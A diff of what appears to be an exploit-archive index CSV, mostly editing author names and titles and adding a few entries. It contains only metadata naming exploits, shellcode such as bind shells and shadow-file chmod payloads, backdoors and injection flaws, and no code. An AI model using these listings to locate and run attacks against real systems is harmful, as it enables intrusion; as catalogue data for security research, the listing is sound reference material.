40363,platforms/win_x86/shellcode/40363.c,"Windows x86 - Password Protected TCP Bind Shell (637 bytes)",2016-09-13,"Roziul Hasan Khan Shifat",win_x86,shellcode,0
|
||||
40364,platforms/php/webapps/40364.txt,"wdCalendar 2 - SQL Injection",2016-09-13,"Alfonso Castillo Angel",php,webapps,80
|
||||
40365,platforms/windows/local/40365.txt,"Zapya Desktop 1.803 - (ZapyaService.exe) Privilege Escalation",2016-09-13,"Arash Khazaei",windows,local,0
|
||||
40365,platforms/windows/local/40365.txt,"Zapya Desktop 1.803 - 'ZapyaService.exe' Privilege Escalation",2016-09-13,"Arash Khazaei",windows,local,0
|
||||
40367,platforms/cgi/webapps/40367.sh,"Exper EWM-01 ADSL/MODEM - Unauthenticated DNS Change",2016-09-13,"Todor Donev",cgi,webapps,80
|
||||
21673,platforms/windows/dos/21673.txt,"IPSwitch IMail 6.x/7.0.x - Web Calendaring Incomplete Post Denial of Service",2002-07-30,anonymous,windows,dos,0
|
||||
21674,platforms/linux/local/21674.c,"William Deich Super 3.x - SysLog Format String",2002-07-31,gobbles,linux,local,0
|
||||
|
@ -20501,7 +20502,7 @@ id,file,description,date,author,platform,type,port
|
|||
23263,platforms/multiple/dos/23263.txt,"Opera 7.11/7.20 HREF - Malformed Server Name Heap Corruption",2003-10-20,@stake,multiple,dos,0
|
||||
23264,platforms/php/webapps/23264.txt,"DeskPro 1.1 - Multiple SQL Injections",2003-10-20,"Aviram Jenik",php,webapps,0
|
||||
23265,platforms/windows/remote/23265.txt,"Sun Java Plugin 1.4.2 _01 - Cross-Site Applet Sandbox Security Model Violation",2003-10-20,"Marc Schoenefeld",windows,remote,0
|
||||
23266,platforms/cgi/webapps/23266.txt,"Dansie Shopping Cart - Server Error Message Installation Full Path Disclosure",2003-10-20,Dr`Ponidi,cgi,webapps,0
|
||||
23266,platforms/cgi/webapps/23266.txt,"Dansie Shopping Cart - Server Error Message Installation Full Path Disclosure",2003-10-20,Dr_Ponidi,cgi,webapps,0
|
||||
23267,platforms/windows/dos/23267.txt,"Atrium Software Mercur MailServer 3.3/4.0/4.2 - IMAP AUTH Remote Buffer Overflow",2003-10-20,"Kostya KORTCHINSKY",windows,dos,0
|
||||
23268,platforms/java/webapps/23268.txt,"Vivisimo Clustering Engine - Search Script Cross-Site Scripting",2003-10-21,ComSec,java,webapps,0
|
||||
23269,platforms/php/webapps/23269.txt,"FuzzyMonkey 2.11 - MyClassifieds Email Variable SQL Injection",2003-10-21,Ezhilan,php,webapps,0
|
||||
|
@ -21759,7 +21760,7 @@ id,file,description,date,author,platform,type,port
|
|||
24587,platforms/php/webapps/24587.txt,"PostNuke Modules Factory Subjects Module 2.0 - SQL Injection",2004-09-10,Criolabs,php,webapps,0
|
||||
24588,platforms/asp/webapps/24588.txt,"GetSolutions GetIntranet 2.2 - Multiple Remote Input Validation Vulnerabilities",2004-09-10,Criolabs,asp,webapps,0
|
||||
24589,platforms/asp/webapps/24589.txt,"GetSolutions GetInternet - Multiple SQL Injections",2004-09-10,Criolabs,asp,webapps,0
|
||||
24590,platforms/linux/dos/24590.txt,"Apache/mod_ssl 2.0.x - Remote Denial of Service",2004-09-10,"M. ""Alex"" Hankins",linux,dos,0
|
||||
24590,platforms/linux/dos/24590.txt,"Apache/mod_ssl 2.0.x - Remote Denial of Service",2004-09-10,"M. _Alex_ Hankins",linux,dos,0
|
||||
24591,platforms/cgi/webapps/24591.txt,"PerlDesk Language Variable - Server-Side Script Execution",2004-09-13,"Nikyt0x Argentina",cgi,webapps,0
|
||||
24592,platforms/multiple/dos/24592.txt,"Pingtel Xpressa 1.2.x/2.0/2.1 - Handset Remote Denial of Service",2004-09-13,@stake,multiple,dos,0
|
||||
24593,platforms/unix/dos/24593.txt,"QNX Photon phrelay-cfg - -s Parameter Overflow",2004-09-13,"Julio Cesar Fort",unix,dos,0
|
||||
|
@ -22932,7 +22933,7 @@ id,file,description,date,author,platform,type,port
|
|||
33422,platforms/php/webapps/33422.txt,"JBC Explorer 7.20 - 'arbre.php' Cross-Site Scripting",2009-12-20,Metropolis,php,webapps,0
|
||||
33423,platforms/hardware/remote/33423.txt,"Barracuda Web Application Firewall 660 - 'cgi-mod/index.cgi' Multiple HTML Injection Vulnerabilities",2009-12-19,Global-Evolution,hardware,remote,0
|
||||
33424,platforms/php/webapps/33424.txt,"Kasseler CMS 1.3.4 Lite - Multiple Cross-Site Scripting Vulnerabilities",2009-12-21,Gamoscu,php,webapps,0
|
||||
33425,platforms/php/webapps/33425.py,"SPIP - CMS < 3.0.9 / 2.1.22 / 2.0.23 - Privilege Escalation",2014-05-19,"Gregory DRAPERI",php,webapps,80
|
||||
33425,platforms/php/webapps/33425.py,"SPIP - CMS < 3.0.9 / 2.1.22 / 2.0.23 - Privilege Escalation",2014-05-19,"Gregory Draperi",php,webapps,80
|
||||
25777,platforms/php/webapps/25777.txt,"PowerDownload 3.0.2/3.0.3 - IncDir Remote File Inclusion",2005-05-31,"SoulBlack Group",php,webapps,0
|
||||
25778,platforms/php/webapps/25778.txt,"Calendarix 0.8.20071118 - Multiple SQL Injections / Cross-Site Scripting Vulnerabilities",2005-05-31,DarkBicho,php,webapps,0
|
||||
25779,platforms/php/webapps/25779.txt,"MyBB - Multiple Cross-Site Scripting / SQL Injection",2005-05-31,"Alberto Trivero",php,webapps,0
|
||||
|
@ -23326,7 +23327,7 @@ id,file,description,date,author,platform,type,port
|
|||
26171,platforms/php/webapps/26171.php,"PHPOutsourcing Zorum 3.5 - Prod.php Arbitrary Command Execution",2005-08-18,rgod,php,webapps,0
|
||||
26172,platforms/php/webapps/26172.txt,"Mantis 0.x/1.0 - Multiple Input Validation Vulnerabilities",2005-08-19,anonymous,php,webapps,0
|
||||
26173,platforms/windows/dos/26173.txt,"AXIS Media Control 6.2.10.11 - Unsafe ActiveX Method",2013-06-13,"Javier Repiso Sánchez",windows,dos,0
|
||||
26174,platforms/hardware/webapps/26174.txt,"Airlive IP Cameras - Multiple Vulnerabilities",2013-06-13,"Sánchez, Lopez, Castillo",hardware,webapps,0
|
||||
26174,platforms/hardware/webapps/26174.txt,"Airlive IP Cameras - Multiple Vulnerabilities",2013-06-13,"Sánchez_ Lopez_ Castillo",hardware,webapps,0
|
||||
26175,platforms/windows/remote/26175.rb,"Microsoft Internet Explorer - COALineDashStyleArray Integer Overflow (MS13-009)",2013-06-13,Metasploit,windows,remote,0
|
||||
26176,platforms/php/webapps/26176.txt,"Woltlab Burning Board 2.x - ModCP.php SQL Injection",2005-08-20,[R],php,webapps,0
|
||||
26177,platforms/php/webapps/26177.txt,"Land Down Under 800/801 - links.php w Parameter SQL Injection",2005-08-20,bl2k,php,webapps,0
|
||||
|
@ -23459,7 +23460,7 @@ id,file,description,date,author,platform,type,port
|
|||
26330,platforms/multiple/remote/26330.txt,"Oracle HTML DB 1.5/1.6 - wwv_flow.accept p_t02 Parameter Cross-Site Scripting",2005-10-07,Red-Database-Security,multiple,remote,0
|
||||
26331,platforms/multiple/dos/26331.txt,"Oracle 9.0 iSQL*Plus TLS Listener - Remote Denial of Service",2005-10-07,"Alexander Kornbrust",multiple,dos,0
|
||||
26318,platforms/hardware/remote/26318.py,"TP-Link Print Server TL PS110U - Sensitive Information Enumeration",2013-06-19,SANTHO,hardware,remote,0
|
||||
26319,platforms/php/webapps/26319.txt,"Monkey CMS - Multiple Vulnerabilities",2013-06-19,"Yashar shahinzadeh, Mormoroth",php,webapps,0
|
||||
26319,platforms/php/webapps/26319.txt,"Monkey CMS - Multiple Vulnerabilities",2013-06-19,"Yashar shahinzadeh_ Mormoroth",php,webapps,0
|
||||
26328,platforms/php/webapps/26328.txt,"Utopia News Pro 1.1.3 - footer.php Multiple Parameter Cross-Site Scripting",2005-10-07,rgod,php,webapps,0
|
||||
26329,platforms/multiple/remote/26329.txt,"Oracle HTML DB 1.5/1.6 - f p Parameter Cross-Site Scripting",2005-10-07,Red-Database-Security,multiple,remote,0
|
||||
26321,platforms/linux/local/26321.c,"Gnome-PTY-Helper UTMP - Hostname Spoofing",2005-10-03,"Paul Szabo",linux,local,0
|
||||
|
@ -24058,6 +24059,7 @@ id,file,description,date,author,platform,type,port
|
|||
26931,platforms/asp/webapps/26931.txt,"ProjectApp 3.3 - search_employees.asp keywords Parameter Cross-Site Scripting",2005-12-21,r0t,asp,webapps,0
|
||||
26932,platforms/asp/webapps/26932.txt,"ProjectApp 3.3 - cat.asp keywords Parameter Cross-Site Scripting",2005-12-21,r0t,asp,webapps,0
|
||||
26933,platforms/cgi/webapps/26933.txt,"ProjectApp 3.3 - links.asp keywords Parameter Cross-Site Scripting",2005-12-21,r0t,cgi,webapps,0
|
||||
40385,platforms/netbsd_x86/local/40385.rb,"NetBSD mail.local - Privilege Escalation (Metasploit)",2016-09-15,Metasploit,netbsd_x86,local,0
|
||||
26934,platforms/asp/webapps/26934.txt,"ProjectApp 3.3 - pmprojects.asp projectid Parameter Cross-Site Scripting",2005-12-21,r0t,asp,webapps,0
|
||||
26935,platforms/asp/webapps/26935.txt,"ProjectApp 3.3 - 'login.asp' ret_page Parameter Cross-Site Scripting",2005-12-21,r0t,asp,webapps,0
|
||||
26936,platforms/asp/webapps/26936.txt,"ProjectApp 3.3 - default.asp skin_number Parameter Cross-Site Scripting",2005-12-21,r0t,asp,webapps,0
|
||||
|
@ -24111,6 +24113,7 @@ id,file,description,date,author,platform,type,port
|
|||
26984,platforms/php/webapps/26984.txt,"IceWarp Universal WebMail - /mail/include.html Crafted HTTP_USER_AGENT Arbitrary File Access",2005-12-27,"Tan Chew Keong",php,webapps,0
|
||||
26985,platforms/windows/dos/26985.txt,"Microsoft Internet Explorer 5.0.1 - HTML Parsing Denial of Service",2005-12-27,"Christian Deneke",windows,dos,0
|
||||
26986,platforms/cfm/webapps/26986.txt,"PaperThin CommonSpot Content Server 4.5 - Cross-Site Scripting",2005-12-23,r0t3d3Vil,cfm,webapps,0
|
||||
40384,platforms/java/webapps/40384.txt,"Apache Mina 2.0.13 - Remote Command Execution",2016-09-15,"Gregory Draperi",java,webapps,0
|
||||
26987,platforms/java/webapps/26987.txt,"FatWire UpdateEngine 6.2 - Multiple Cross-Site Scripting Vulnerabilities",2005-12-27,r0t3d3Vil,java,webapps,0
|
||||
26988,platforms/php/webapps/26988.txt,"Koobi 5.0 - BBCode URL Tag Script Injection",2005-12-28,"kurdish hackers team",php,webapps,0
|
||||
26989,platforms/php/webapps/26989.txt,"GMailSite 1.0.x - Cross-Site Scripting",2005-12-29,Lostmon,php,webapps,0
|
||||
|
@ -24999,7 +25002,7 @@ id,file,description,date,author,platform,type,port
|
|||
27891,platforms/hardware/remote/27891.txt,"Ipswitch WhatsUp Professional 2006 - Authentication Bypass",2006-05-17,"Kenneth F. Belva",hardware,remote,0
|
||||
27892,platforms/hardware/remote/27892.txt,"obotix IP Camera M1 1.9.4 .7/M10 2.0.5.2 - help Script Cross-Site Scripting",2006-05-17,"Jaime Blasco",hardware,remote,0
|
||||
27893,platforms/hardware/remote/27893.txt,"obotix IP Camera M1 1.9.4 .7/M10 2.0.5.2 - events.tar source_ip Parameter Cross-Site Scripting",2006-05-17,"Jaime Blasco",hardware,remote,0
|
||||
40382,platforms/multiple/remote/40382.txt,"Apache Mina 2.0.13 - Remote Command Execution",2016-09-14,"Gregory DRAPERI",multiple,remote,0
|
||||
40382,platforms/multiple/remote/40382.txt,"Apache Mina 2.0.13 - Remote Command Execution",2016-09-14,"Gregory Draperi",multiple,remote,0
|
||||
27894,platforms/hardware/remote/27894.txt,"obotix IP Camera M1 1.9.4 .7/M10 2.0.5.2 - eventplayer get_image_info_abspath Parameter Cross-Site Scripting",2006-05-17,"Jaime Blasco",hardware,remote,0
|
||||
27895,platforms/cgi/webapps/27895.txt,"Cosmoshop 8.10.78/8.11.106 - Lshop.cgi SQL Injection",2006-05-18,l0om,cgi,webapps,0
|
||||
27896,platforms/asp/webapps/27896.txt,"ASPBB 0.5.2 - default.asp action Parameter Cross-Site Scripting",2006-05-18,TeufeL,asp,webapps,0
|
||||
|
@ -26767,7 +26770,7 @@ id,file,description,date,author,platform,type,port
|
|||
29703,platforms/php/webapps/29703.txt,"Tyger Bug Tracking System 1.1.3 - 'ViewBugs.php' 's' Variable SQL Injection",2007-02-26,CorryL,php,webapps,0
|
||||
29704,platforms/php/webapps/29704.txt,"Tyger Bug Tracking System 1.1.3 - 'login.php' PATH_INFO Parameter Cross-Site Scripting",2007-02-26,CorryL,php,webapps,0
|
||||
29705,platforms/php/webapps/29705.txt,"Tyger Bug Tracking System 1.1.3 - register.php PATH_INFO Parameter Cross-Site Scripting",2007-02-26,CorryL,php,webapps,0
|
||||
29706,platforms/linux/remote/29706.txt,"DeepOfix SMTP Server 3.3 - Authentication Bypass",2013-11-19,"Gerardo Vazquez, Eduardo Arriols",linux,remote,0
|
||||
29706,platforms/linux/remote/29706.txt,"DeepOfix SMTP Server 3.3 - Authentication Bypass",2013-11-19,"Gerardo Vazquez_ Eduardo Arriols",linux,remote,0
|
||||
29707,platforms/windows/dos/29707.txt,"JPEGView 1.0.29 - Crash (PoC)",2013-11-19,"Debasish Mandal",windows,dos,0
|
||||
29709,platforms/hardware/webapps/29709.txt,"Ruckus Wireless Zoneflex 2942 Wireless Access Point - Authentication Bypass",2013-11-19,myexploit,hardware,webapps,80
|
||||
30368,platforms/php/webapps/30368.txt,"Alstrasoft Sms Text Messaging Enterprise 2.0 - admin/edituser.php userid Parameter Cross-Site Scripting",2007-07-23,Lostmon,php,webapps,0
|
||||
|
@ -31927,7 +31930,7 @@ id,file,description,date,author,platform,type,port
|
|||
35392,platforms/php/webapps/35392.txt,"WordPress Plugin IGIT Posts Slider Widget 1.0 - 'src' Parameter Cross-Site Scripting",2011-02-23,"AutoSec Tools",php,webapps,0
|
||||
35393,platforms/php/webapps/35393.txt,"WordPress Plugin ComicPress Manager 1.4.9 - 'lang' Parameter Cross-Site Scripting",2011-02-23,"AutoSec Tools",php,webapps,0
|
||||
35394,platforms/php/webapps/35394.txt,"WordPress Plugin YT-Audio 1.7 - 'v' Parameter Cross-Site Scripting",2011-02-23,"AutoSec Tools",php,webapps,0
|
||||
35396,platforms/php/webapps/35396.txt,"xEpan 1.0.4 - Multiple Vulnerabilities",2014-11-28,"Parikesit , Kurawa",php,webapps,0
|
||||
35396,platforms/php/webapps/35396.txt,"xEpan 1.0.4 - Multiple Vulnerabilities",2014-11-28,"Parikesit _ Kurawa",php,webapps,0
|
||||
35397,platforms/php/webapps/35397.txt,"Drupal Module Cumulus 5.x-1.1/6.x-1.4 - 'tagcloud' Parameter Cross-Site Scripting",2011-02-23,MustLive,php,webapps,0
|
||||
35398,platforms/multiple/remote/35398.pl,"KMPlayer 2.9.3.1214 - '.ksf' Remote Buffer Overflow",2011-02-28,KedAns-Dz,multiple,remote,0
|
||||
35399,platforms/windows/remote/35399.pl,"DivX Player 6.x - '.dps' Remote Buffer Overflow",2011-02-28,KedAns-Dz,windows,remote,0
|
||||
|
@ -32041,8 +32044,8 @@ id,file,description,date,author,platform,type,port
|
|||
35507,platforms/windows/dos/35507.pl,"DivX Player 7 - Multiple Remote Buffer Overflow Vulnerabilities",2011-03-27,KedAns-Dz,windows,dos,0
|
||||
35508,platforms/php/webapps/35508.txt,"Cetera eCommerce - Multiple Cross-Site Scripting / SQL Injection",2011-03-27,MustLive,php,webapps,0
|
||||
35509,platforms/windows/remote/35509.pl,"FLVPlayer4Free 2.9 - '.fp4f' Remote Buffer Overflow",2011-03-27,KedAns-Dz,windows,remote,0
|
||||
35510,platforms/php/webapps/35510.txt,"Humhub 0.10.0-rc.1 - SQL Injection",2014-12-10,"Jos Wetzels, Emiel Florijn",php,webapps,0
|
||||
35511,platforms/php/webapps/35511.txt,"Humhub 0.10.0-rc.1 - Multiple Persistent Cross-Site Scripting Vulnerabilities",2014-12-10,"Jos Wetzels, Emiel Florijn",php,webapps,0
|
||||
35510,platforms/php/webapps/35510.txt,"Humhub 0.10.0-rc.1 - SQL Injection",2014-12-10,"Jos Wetzels_ Emiel Florijn",php,webapps,0
|
||||
35511,platforms/php/webapps/35511.txt,"Humhub 0.10.0-rc.1 - Multiple Persistent Cross-Site Scripting Vulnerabilities",2014-12-10,"Jos Wetzels_ Emiel Florijn",php,webapps,0
|
||||
35558,platforms/php/webapps/35558.txt,"PHP-Fusion - 'articles.php' Cross-Site Scripting",2011-04-02,KedAns-Dz,php,webapps,0
|
||||
35559,platforms/php/webapps/35559.txt,"MyBB 1.4/1.6 - Multiple Security Vulnerabilities",2011-04-04,MustLive,php,webapps,0
|
||||
35513,platforms/linux/remote/35513.py,"Apache James Server 2.3.2 - Remote Command Execution",2014-12-10,"Jakub Palaczynski",linux,remote,4555
|
||||
|
@ -32268,7 +32271,7 @@ id,file,description,date,author,platform,type,port
|
|||
35767,platforms/php/webapps/35767.txt,"Gecko CMS 2.3 - Multiple Vulnerabilities",2015-01-13,LiquidWorm,php,webapps,80
|
||||
35998,platforms/php/webapps/35998.txt,"CobraScripts Trading Marketplace Script - 'cid' Parameter SQL Injection",2011-07-25,Ehsan_Hp200,php,webapps,0
|
||||
35786,platforms/multiple/webapps/35786.txt,"Ansible Tower 2.0.2 - Multiple Vulnerabilities",2015-01-14,"SEC Consult",multiple,webapps,80
|
||||
35770,platforms/hardware/webapps/35770.py,"Dell iDRAC IPMI 1.5 - Insufficient Session ID Randomness",2015-01-13,"Yong Chuan, Koh",hardware,webapps,623
|
||||
35770,platforms/hardware/webapps/35770.py,"Dell iDRAC IPMI 1.5 - Insufficient Session ID Randomness",2015-01-13,"Yong Chuan_ Koh",hardware,webapps,623
|
||||
35771,platforms/osx/dos/35771.c,"Apple Mac OSX 10.10 - BlueTooth DispatchHCICreateConnection - Crash (PoC)",2015-01-13,"rpaleari and joystick",osx,dos,0
|
||||
35772,platforms/osx/dos/35772.c,"Apple Mac OSX 10.10 - BlueTooth BlueToothHCIChangeLocalName - Crash (PoC)",2015-01-13,"rpaleari and joystick",osx,dos,0
|
||||
35773,platforms/osx/dos/35773.c,"Apple Mac OSX 10.10 - BlueTooth TransferACLPacketToHW - Crash (PoC)",2015-01-13,"rpaleari and joystick",osx,dos,0
|
||||
|
@ -33779,9 +33782,9 @@ id,file,description,date,author,platform,type,port
|
|||
37383,platforms/php/webapps/37383.php,"Joomla! Component Easy Flash Uploader - 'helper.php' Arbitrary File Upload",2012-06-12,"Sammy FORGIT",php,webapps,0
|
||||
37384,platforms/lin_x86/shellcode/37384.c,"Linux/x86 - execve /bin/sh Shellcode (23 bytes)",2015-06-26,"Bill Borskey",lin_x86,shellcode,0
|
||||
37386,platforms/osx/dos/37386.php,"Apple Mac OSX 10.10.3 (Yosemite) Safari 8.0.x - Crash (PoC)",2015-06-26,"Mohammad Reza Espargham",osx,dos,0
|
||||
37387,platforms/php/webapps/37387.txt,"Koha 3.20.1 - Multiple SQL Injections",2015-06-26,"Raschin Tavakoli, Bernhard Garn, Peter Aufner and Dimitris Simos",php,webapps,0
|
||||
37388,platforms/php/webapps/37388.txt,"Koha 3.20.1 - Directory Traversal",2015-06-26,"Raschin Tavakoli, Bernhard Garn, Peter Aufner and Dimitris Simos",php,webapps,0
|
||||
37389,platforms/php/webapps/37389.txt,"Koha 3.20.1 - Multiple Cross-Site Scripting / Cross-Site Request Forgery Vulnerabilities",2015-06-26,"Raschin Tavakoli, Bernhard Garn, Peter Aufner and Dimitris Simos",php,webapps,0
|
||||
37387,platforms/php/webapps/37387.txt,"Koha 3.20.1 - Multiple SQL Injections",2015-06-26,"Raschin Tavakoli_ Bernhard Garn_ Peter Aufner and Dimitris Simos",php,webapps,0
|
||||
37388,platforms/php/webapps/37388.txt,"Koha 3.20.1 - Directory Traversal",2015-06-26,"Raschin Tavakoli_ Bernhard Garn_ Peter Aufner and Dimitris Simos",php,webapps,0
|
||||
37389,platforms/php/webapps/37389.txt,"Koha 3.20.1 - Multiple Cross-Site Scripting / Cross-Site Request Forgery Vulnerabilities",2015-06-26,"Raschin Tavakoli_ Bernhard Garn_ Peter Aufner and Dimitris Simos",php,webapps,0
|
||||
37390,platforms/lin_x86/shellcode/37390.asm,"Linux/x86 - chmod('/etc/passwd'_0777) Shellcode (42 bytes)",2015-06-26,"Mohammad Reza Espargham",lin_x86,shellcode,0
|
||||
37391,platforms/lin_x86/shellcode/37391.asm,"Linux/x86 - chmod('/etc/gshadow') Shellcode (37 bytes)",2015-06-26,"Mohammad Reza Espargham",lin_x86,shellcode,0
|
||||
37392,platforms/lin_x86/shellcode/37392.asm,"Linux/x86 - chmod('/etc/shadow'_'0777') Shellcode (42 bytes)",2015-06-26,"Mohammad Reza Espargham",lin_x86,shellcode,0
|
||||
|
@ -34000,7 +34003,7 @@ id,file,description,date,author,platform,type,port
|
|||
37623,platforms/hardware/webapps/37623.txt,"15 TOTOLINK Router Models - Multiple Remote Code Execution Vulnerabilities",2015-07-16,"Pierre Kim",hardware,webapps,0
|
||||
37624,platforms/hardware/webapps/37624.txt,"4 TOTOLINK Router Models - Cross-Site Request Forgery / Cross-Site Scripting",2015-07-16,"Pierre Kim",hardware,webapps,0
|
||||
37625,platforms/hardware/webapps/37625.txt,"4 TOTOLINK Router Models - Backdoor Credentials",2015-07-16,"Pierre Kim",hardware,webapps,0
|
||||
37626,platforms/hardware/webapps/37626.txt,"8 TOTOLINK Router Models - Backdoor and Remote Code Execution",2015-07-16,"Pierre Kim",hardware,webapps,0
|
||||
37626,platforms/hardware/webapps/37626.txt,"8 TOTOLINK Router Models - Backdoor / Remote Code Execution",2015-07-16,"Pierre Kim",hardware,webapps,0
|
||||
37628,platforms/hardware/remote/37628.rb,"D-Link - Cookie Command Execution",2015-07-17,Metasploit,hardware,remote,0
|
||||
37629,platforms/php/webapps/37629.txt,"WordPress Plugin BuddyPress Activity Plus 1.5 - Cross-Site Request Forgery",2015-07-17,"Tom Adams",php,webapps,80
|
||||
37630,platforms/php/webapps/37630.txt,"Hotel Booking Portal 0.1 - Multiple SQL Injections / Cross-Site Scripting",2012-08-09,"Yakir Wizman",php,webapps,0
|
||||
|
@ -34805,7 +34808,7 @@ id,file,description,date,author,platform,type,port
|
|||
38483,platforms/hardware/dos/38483.txt,"TP-Link TL-WR741N / TL-WR741ND Routers - Multiple Denial of Service Vulnerabilities",2013-04-19,W1ckerMan,hardware,dos,0
|
||||
38484,platforms/php/webapps/38484.rb,"WordPress Plugin Ajax Load More < 2.8.2 - Arbitrary File Upload",2015-10-18,PizzaHatHacker,php,webapps,0
|
||||
38485,platforms/windows/dos/38485.py,"VideoLAN VLC Media Player 2.2.1 - libvlccore '.mp3' Stack Overflow",2015-10-18,"Andrea Sindoni",windows,dos,0
|
||||
38486,platforms/windows/local/38486.py,"Tomabo MP4 Player 3.11.6 - SEH Based Stack Overflow",2015-10-18,"yokoacc, nudragn, rungga_reksya",windows,local,0
|
||||
38486,platforms/windows/local/38486.py,"Tomabo MP4 Player 3.11.6 - SEH Based Stack Overflow",2015-10-18,"yokoacc_ nudragn_ rungga_reksya",windows,local,0
|
||||
38487,platforms/php/webapps/38487.txt,"WordPress Theme Colormix - Multiple Security Vulnerabilities",2013-04-21,MustLive,php,webapps,0
|
||||
38488,platforms/hardware/webapps/38488.txt,"Belkin Router N150 1.00.08 / 1.00.09 - Directory Traversal",2015-10-19,"Rahul Pratap Singh",hardware,webapps,0
|
||||
38489,platforms/php/remote/38489.rb,"Nibbleblog - Arbitrary File Upload",2015-10-19,Metasploit,php,remote,0
|
||||
|
@ -34970,7 +34973,7 @@ id,file,description,date,author,platform,type,port
|
|||
39374,platforms/osx/dos/39374.c,"Apple Mac OSX - Kernel IOAccelMemoryInfoUserClient Use-After-Free",2016-01-28,"Google Security Research",osx,dos,0
|
||||
38659,platforms/windows/dos/38659.py,"POP Peeper 4.0.1 - Overwrite (SEH)",2015-11-09,Un_N0n,windows,dos,0
|
||||
38660,platforms/php/remote/38660.rb,"WordPress Plugin Ajax Load More 2.8.1.1 - PHP Upload",2015-11-09,Metasploit,php,remote,0
|
||||
38661,platforms/php/webapps/38661.txt,"TestLink 1.9.14 - Cross-Site Request Forgery",2015-11-09,"Aravind C Ajayan, Balagopal N",php,webapps,0
|
||||
38661,platforms/php/webapps/38661.txt,"TestLink 1.9.14 - Cross-Site Request Forgery",2015-11-09,"Aravind C Ajayan_ Balagopal N",php,webapps,0
|
||||
38662,platforms/multiple/dos/38662.txt,"FreeType 2.6.1 - TrueType tt_sbit_decoder_load_bit_aligned Heap Based Out-of-Bounds Read",2015-11-09,"Google Security Research",multiple,dos,0
|
||||
38663,platforms/hardware/remote/38663.txt,"Huawei HG630a and HG630a-50 - Default SSH Admin Password on ADSL Modems",2015-11-10,"Murat Sahin",hardware,remote,0
|
||||
38664,platforms/java/webapps/38664.py,"Jenkins 1.633 - Unauthenticated Credential Recovery",2015-11-10,"The Repo",java,webapps,0
|
||||
|
@ -36293,7 +36296,7 @@ id,file,description,date,author,platform,type,port
|
|||
40060,platforms/jsp/webapps/40060.txt,"24online SMS_2500i 8.3.6 build 9.0 - SQL Injection",2016-07-06,"Rahul Raz",jsp,webapps,80
|
||||
40061,platforms/lin_x86-64/shellcode/40061.c,"Linux/x86-64 - Ncat Shellcode (SSL_ MultiChannel_ Persistant_ Fork_ IPv4/6_ Password) (176 bytes)",2016-07-06,Kyzer,lin_x86-64,shellcode,0
|
||||
40062,platforms/php/webapps/40062.txt,"Advanced Webhost Billing System (AWBS) 2.9.6 - Multiple Vulnerabilities",2016-07-06,"Bikramaditya Guha",php,webapps,80
|
||||
40063,platforms/cgi/webapps/40063.txt,"PaKnPost Pro 1.14 - Multiple Vulnerabilities",2016-07-06,"Edvin Rustemagic, Grega Preseren",cgi,webapps,80
|
||||
40063,platforms/cgi/webapps/40063.txt,"PaKnPost Pro 1.14 - Multiple Vulnerabilities",2016-07-06,"Edvin Rustemagic_ Grega Preseren",cgi,webapps,80
|
||||
40064,platforms/linux/remote/40064.txt,"GNU Wget < 1.18 - Arbitrary File Upload / Remote Code Execution",2016-07-06,"Dawid Golunski",linux,remote,0
|
||||
40065,platforms/jsp/webapps/40065.txt,"OpenFire 3.10.2 < 4.0.1 - Multiple Vulnerabilities",2016-07-06,Sysdream,jsp,webapps,80
|
||||
40066,platforms/android/local/40066.txt,"Samsung Android JACK - Privilege Escalation",2016-07-06,"Google Security Research",android,local,0
|
||||
|
@ -36396,7 +36399,7 @@ id,file,description,date,author,platform,type,port
|
|||
40200,platforms/hardware/remote/40200.txt,"NUUO NVRmini2 / NVRsolo / Crystal Devices and NETGEAR ReadyNAS Surveillance Application - Multiple Vulnerabilities",2016-08-05,"Pedro Ribeiro",hardware,remote,0
|
||||
40201,platforms/linux/remote/40201.txt,"ntop/nbox 2.3 <= 2.5 - Multiple Vulnerabilities",2016-08-05,"Javier Marcos",linux,remote,0
|
||||
40202,platforms/php/webapps/40202.txt,"Subrion CMS 4.0.5 - SQL Injection",2016-08-05,Vulnerability-Lab,php,webapps,80
|
||||
40203,platforms/linux/local/40203.py,"zFTP Client 20061220 - (Connection Name) Local Buffer Overflow",2016-08-05,"Juan Sacco",linux,local,0
|
||||
40203,platforms/linux/local/40203.py,"zFTP Client 20061220 - 'Connection Name' Local Buffer Overflow",2016-08-05,"Juan Sacco",linux,local,0
|
||||
40204,platforms/php/webapps/40204.txt,"PHP Power Browse 1.2 - Directory Traversal",2016-08-05,"Manuel Mancera",php,webapps,80
|
||||
40205,platforms/cgi/webapps/40205.txt,"Davolink DV-2051 - Multiple Vulnerabilities",2016-08-05,"Eric Flokstra",cgi,webapps,80
|
||||
40206,platforms/php/webapps/40206.txt,"WordPress Plugin Count per Day 3.5.4 - Persistent Cross-Site Scripting",2016-08-05,"Julien Rentrop",php,webapps,80
|
||||
|
@ -36408,7 +36411,7 @@ id,file,description,date,author,platform,type,port
|
|||
40212,platforms/php/webapps/40212.txt,"NUUO NVRmini 2 3.0.8 - Multiple OS Command Injection",2016-08-06,LiquidWorm,php,webapps,80
|
||||
40213,platforms/cgi/webapps/40213.txt,"NUUO NVRmini 2 3.0.8 - Remote Code Execution (Shellshock)",2016-08-06,LiquidWorm,cgi,webapps,80
|
||||
40214,platforms/php/webapps/40214.txt,"NUUO NVRmini 2 3.0.8 - Arbitrary File Deletion",2016-08-06,LiquidWorm,php,webapps,80
|
||||
40215,platforms/php/webapps/40215.txt,"NUUO NVRmini 2 3.0.8 - (strong_user.php) Backdoor Remote Shell Access",2016-08-06,LiquidWorm,php,webapps,80
|
||||
40215,platforms/php/webapps/40215.txt,"NUUO NVRmini 2 3.0.8 - 'strong_user.php' Backdoor Remote Shell Access",2016-08-06,LiquidWorm,php,webapps,80
|
||||
40216,platforms/jsp/webapps/40216.txt,"Navis Webaccess - SQL Injection",2016-08-08,bRpsd,jsp,webapps,9000
|
||||
40218,platforms/php/webapps/40218.txt,"PHPCollab CMS 2.5 - (emailusers.php) SQL Injection",2016-08-08,Vulnerability-Lab,php,webapps,80
|
||||
40219,platforms/windows/local/40219.txt,"Microsoft Windows 7 (x32/x64) - Group Policy Privilege Escalation (MS16-072)",2016-08-08,"Nabeel Ahmed",windows,local,0
|
||||
|
@ -36452,7 +36455,7 @@ id,file,description,date,author,platform,type,port
|
|||
40255,platforms/windows/dos/40255.txt,"Microsoft GDI+ - DecodeCompressedRLEBitmap Invalid Pointer Arithmetic Out-of-Bounds Write (MS16-097)",2016-08-17,"Google Security Research",windows,dos,0
|
||||
40256,platforms/windows/dos/40256.txt,"Microsoft GDI+ - ValidateBitmapInfo Invalid Pointer Arithmetic Out-of-Bounds Reads (MS16-097)",2016-08-17,"Google Security Research",windows,dos,0
|
||||
